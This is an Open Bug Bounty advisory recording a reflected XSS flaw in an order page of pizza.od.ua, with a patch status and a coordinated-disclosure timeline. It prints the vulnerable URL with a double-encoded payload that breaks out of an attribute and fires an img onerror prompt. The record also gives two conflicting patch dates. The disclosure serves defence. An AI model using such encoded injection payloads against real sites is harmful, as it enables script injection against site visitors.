pizza.od.ua XSS vulnerability

2017-12-18T18:16:00
ID OBB:455047
Type openbugbounty
Reporter qiece
Modified 2018-01-18T10:00:00

Description

Vulnerable URL:
http://pizza.od.ua/personal/order/make/index.php?ORDER_ID=2857011%25%32%32%25%33%65%25%33%63%25%36%39%25%36%64%25%36%37%25%32%30%25%37%33%25%37%32%25%36%33%25%33%64%25%37%38%25%32%30%25%36%66%25%36%65%25%36%35%25%37%32%25%37%32%25%36%66%25%37%32%25%33%64%25%37%30%25%37%32%25%36%66%25%36%64%25%37%30%25%37%34%25%32%38%25%32%66%25%34%66%25%35%30%25%34%35%25%34%65%25%34%32%25%35%35%25%34%37%25%34%32%25%34%66%25%35%35%25%34%65%25%35%34%25%35%39%25%32%66%25%32%39%25%33%65
Details:

Description| Value
---|---
Patched:| Yes, at 19.12.2017
Latest check for patch:| 19.12.2017 15:37 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 755135
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 18 December, 2017 18:16 GMT
Generic security notifications sent to website owner| 18 December, 2017 18:19 GMT
Customized security notification sent to website owner| 18 December, 2017 18:19 GMT
Vulnerability details disclosed by researcher| 17 January, 2018 18:45 GMT
Vulnerability patched by the website owner| 18 January, 2018 10:00 GMT